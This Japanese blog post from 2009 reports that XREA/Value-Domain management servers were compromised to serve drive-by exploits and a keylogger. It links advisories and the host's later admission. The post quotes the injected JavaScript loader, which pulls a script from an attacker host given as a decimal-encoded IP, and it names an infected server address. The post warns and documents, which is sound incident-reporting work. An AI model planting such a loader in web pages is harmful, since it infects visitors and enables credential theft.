モーグルとカバとパウダーの日記 このページをアンテナに追加 RSSフィード Twitter

モーグルやカバ(EXカービングスキー)、山スキー(BC)の山行記録などがメインの日記です。
いろんな条件のいろんなところを、その時々の条件にあった滑り方で楽しむ、フリースキーをして遊んでいます。

検索で来られた方は、上の検索窓から再度検索していただくか、右サイドバーのカテゴリーやトピックスの項目で絞り込んでみてください。
仕事柄、コンピュータ系のネタも多いので、スキー関連ネタだけ読みたい方は[ski]、コンピュータ関連ネタは[pc]、スパム関連ネタは[spam]で絞り込んでください。

2009-07-08 (Wed)

[][]デジロウイルス デジロウイルスを含むブックマーク デジロウイルスのブックマークコメント

XREAやValue-Domainの「管理用サーバ」がクラックされていて、例えば管理用のログイン画面やアクセス解析の画面に、javascript経由でFlashAdobe Reader、あと7/7に発表されたゼロデイのActiveXの穴を利用して侵入するコードが埋められている。(7/8 18:00時点でも)

ちなみに現時点で、XREAとValue-Domainどちらも、これらの報告はホームページ上にまだ上がっていない。


バランサーで2ホストにわかれるのだが、片方だけが攻撃コードが埋め込まれているため、普通にアクセスすると攻撃コード有と無しの場合とどちらもありうる。

IPでアクセスすると、現時点でもまだ攻撃コードが有るページを見れる。


VALUE DOMAINってどうよ? part33

http://pc11.2ch.net/test/read.cgi/hosting/1246828727/547

547 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 16:23:31 0

>>539

うわ、まじだ

>Name: ax.xrea.com

>Addresses: 219.101.229.188, 219.101.229.189

前者に不正コード確認、後者はなし

ttp : //219.101.229.188/login.php (現時点で不正コード注意)


攻撃コード部分のみ抜粋(リンクにならないようURL部分を一部変更)

<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement('script');
    js.src ="http : //1856317799:888/jp.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>

これに掛ると、キーロガーを入れられるとのことなんだけど、0x6EA52967:888/dir2/show.phpwgetしてこれなかったので先は追えず。

仮想環境用意してそっから追わせないと拒否られるのかな?


1856317799でぐぐって、ちゃんと検証しているエントリーを探したところ、FFXI(仮)のエントリーが最も早く詳しく検証されていた。

攻撃側はアカハック系っぽいみたい。(だから非常に被害が広がっておかしくないのだけど、意外に小規模な被害で済む気がする)


FFXI(仮)  hellh.net

http://ilion.blog47.fc2.com/blog-entry-140.html


UnderForge of Lack » security

http://www3.atword.jp/gnome/category/security/


(追記)

この件で使われたゼロデイの攻撃手法をふさぐためのページ

マイクロソフト セキュリティ アドバイザリ (972890): Microsoft Video ActiveX コントロールの脆弱性により、リモートでコードが実行される

http://www.microsoft.com/japan/technet/security/advisory/972890.mspx


(追記)

大手で自社で感染を確認した記事がやっと出てきた。

未だ感染ページが修正されていない点で、もっと騒がれておかしくないと思うんだけど、なぜこれしか話題になってないんだろう??

セキュリティ通信|セキュリティ関連ニュース 国内のサイト複数が改ざん〜早急にDirectShowの脆弱性回避策の適用を

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1946


(追記)

今になってやっと公式発表が出た。

感染後2週間たってやっと発表って… あと、ここではアクセス解析のほうに仕込まれてるものについては記述がないけど、あっちはどうなってるんだ??

お知らせ(20090721-1) - VALUE DOMAIN:バリュードメイン

http://www.value-domain.com/info.php?action=press&no=20090721-1


(追記)

Cookieさんから教えていただいて、アクセス解析のほうについても公式発表がされていたのを確認。

アクセス解析 [AccessAnalyzer.com]

http://ax.xrea.com/index.php?action=200907

○原因・経緯

サーバーソフトウェア共に、外部に構築依頼しておりましたが、昨年、同様

の問題(ホームページ編集用のパスワードが受託者以外に漏れていた問題)が

あった以後から、管理を引き継いでおりました。正直に申し上げますと、委託

契約を解除し、そのままシステムを引き継ぎましたが、1番目の解析用サーバー

は、昨年、自社管理のシステムに移して運用中でございましたが、2番目のサー

バーについては、直接の問題対象外であったということもあり、システム移行

作業を怠り、前システムのまま、つまり、類似の問題が解消されない状態で運

用されておりました。

…まあなんだ。嘘無しで正直に報告してあるんだと思うから、そこだけは良いと思う。

人いないんだろうなあ、という感想。



(関連情報)

リネージュ資料室 - ガイド >> セキュリティ対策 (ウィルス情報 - 感染源サイト)

http://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN

スラッシュドット・ジャパン - IEをターゲットにしたゼロデイ攻撃が発生中

http://slashdot.jp/firehose.pl?op=view&id=117594

セキュリティホール memo

http://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090706_DirectShow

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発 - ITmedia エンタープライズ

http://www.itmedia.co.jp/enterprise/articles/0907/07/news015.html

Cookie@信州FMCookie@信州FM 2009/07/22 15:58 アクセス解析のアナウンスは「XREA」のサイトにありますよー。
念のためブログに引用しておきました。
実際中の様子は分かりませんが、今回の対応の遅さと情報公開の遅さは弁解の余地無しです。

Cookie@信州FMCookie@信州FM 2009/07/22 16:02 リンク下記そこねました^^;
http://shinshu.fm/MHz/77.88/archives/0000288712.html

解析サーバーの不具合について(2009/07/21)
http://ax.xrea.com/index.php?action=200907

stealthinustealthinu 2009/07/22 16:19 ありがとうございます。
早速追記させていただきました。

トラックバック - http://d.hatena.ne.jp/stealthinu/20090708/p1